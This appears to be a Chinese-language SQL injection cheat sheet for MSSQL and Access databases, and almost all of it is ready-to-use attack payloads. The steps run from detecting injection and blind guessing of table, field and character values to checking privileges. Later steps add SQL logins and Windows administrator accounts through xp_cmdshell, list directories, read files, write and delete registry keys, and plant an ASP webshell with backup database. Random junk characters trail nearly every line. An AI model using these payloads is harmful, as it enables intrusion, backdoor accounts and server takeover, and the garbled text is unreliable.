1.判断是否有注入;and 1=1 ;and 1=2 d]K$0HY
2.初步判断是否是mssql ;and user>0 Th!;zu^t
9/JBn
3.注入参数是字符'and [查询条件] and ''=' Wi@YJ
Vr:`?V9Q2(
4.搜索时没过滤参数的'and [查询条件] and '%25'=' I+/fX0-Lib
JqV}>"WMV
5.判断数据库系统 fb8)jd'~}O
Om(Ir&0
;and (select count(*) from sysobjects)>0 mssql J,*+Ak
~
hrW2#v
;and (select count(*) from msysobjects)>0 access q.bxnta"
l\WN
3}lIY7O
y&(pt!I
6.猜数据库 ;and (select Count(*) from [数据库名])>0 E1s~ +
)%09j0y>l"
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 $DW__h
#A&49a3^1
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 5><T#0W?
<DN7
9.(1)猜字段的ascii值(access) _9y!,ST
8GeJ%^0o}
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 gu"@*,hL
3qkPe_<I
(2)猜字段的ascii值(mssql) Z~]G+(
?4#UW7I
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 srhI%Zj
dVSQG947i:
10.测试权限结构(mssql) P9)L1l<3I
e5d STc`
phR:=Ox|1
,uPN\`.u8
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- >P ~j@Lv
q[(1zG%NbA
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- XXA.wPD-
0ev='v8?
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- av bup
u6 Yp,!+
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- ft1V1 c
Q<Qd*v&-
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- _p'u!.a?!
=E62N7_`=
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- jLn|zK
DWS#q|j`"
;and 1=(select IS_MEMBER('db_owner'));-- YjiMUi\V
2U3e!V
C]&/k_k
3Ww 37V>h
11.添加mssql和系统的帐户 -<:w{cV
iB5q"hoZC
;exec master.dbo.sp_addlogin username;-- 6mqp`x`
;exec master.dbo.sp_password null,username,password;-- K >Q6
OAaLCpRp
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- qERJEyU?
yL %88,/
;exec master.dbo.xp_cmdshell 'net user username password Wm4C(y@
??f,(om
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- ZiPz~G0[^
6xFchdMG{m
;exec master.dbo.xp_cmdshell 'net user username password /add';--
[?bq4u`
PZVH=dagq
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- p6&<eMwFA
CwD=nT5`
Vjd(Z
s4j]kH
12.(1)遍历目录 ?6UjD5NkX
9&{z?*
;create table dirs(paths varchar(100), id int) Vha,rIi
sL,|+>7T^M
;insert dirs exec master.dbo.xp_dirtree 'c:\' -EP(/CS!
RL[F 9g
;and (select top 1 paths from dirs)>0 xo4lM
xd\ml
37~
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) L)qUBp@MW
6z]y
=J
_sn<"B%>
1'P4{T0 [
(2)遍历目录 bokr,I3
0oZZLi
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- z4(`>z2a
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 6s>io%,:
{0%
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 +F.@n_}p-I
S LNq%7apx
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 YP[8d,
^\[c][fo
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 N,UUM|?9_
m6'9Id-:L
gjx-tp 1.
OO</d:
13.mssql中的存储过程 xUNq!({T
uzT+,
xp_regenumvalues 注册表根键, 子键 L9oLdWa(C
%`~+^{Wp
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 x4h.WDT$
G9Noch9
g
xp_regread 根键,子键,键值名 fhyoSRLR:
vz)R84
;exec xp_regread {Us^4Xe
B@S~v+Gr
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 >I-rsw2
&3J^z7kU
xp_regwrite 根键,子键, 值名, 值类型, 值 K4]#X"
x!7r7|iV
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 i6$HwRZm#
L2_[M'
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 Q}cti/
olr-oi`4C
xp_regdeletevalue 根键,子键,值名 Mp=T;Nz
|!/+T^u
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 ^cE {Uv
E;9J7Q
4
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 C/QrkTi=
JLz32 %-M
a:OM I
/r2S1"(q
14.mssql的backup创建webshell ZpMv16
YQtq?&0Ct
use model ]')y(_{
%YbL%i|U
create table cmd(str image); mnBTZ/ZjS
}%AfZ2g;h
insert into cmd(str) values (''); Qv
g_|~n
|ICn/r~
backup database model to disk='c:\l.asp'; sSc~q+xz
`%^w-'
)Gk?x$pY@
vexF|'!}0#
15.mssql内置函数 q[+h ~)
G
B,O
;and (select @@version)>0 获得Windows的版本号 ti$60Up
;nJ2i?"
;and user_name()='dbo' 判断当前系统的连接用户是不是sa .C&kWM&j
<lNNT6[/r
;and (select user_name())>0 爆当前系统的连接用户 hS*&p0YV~M
]Yf^O @<<>
;and (select db_name())>0 得到当前连接的数据库 E0l&d
x^ `IZ{!
X
@pm !c#
ExN$J
16.简洁的webshell `.dwG3R
Ujlbcv6+
use model 6 !?]
(
Ekik_!aB
create table cmd(str image); FFcIOn
wt;`_}g
insert into cmd(str) values (''); Kv9FqrDj
IOF!Ra:w
backup database model to disk='g:\wwwtest\l.asp';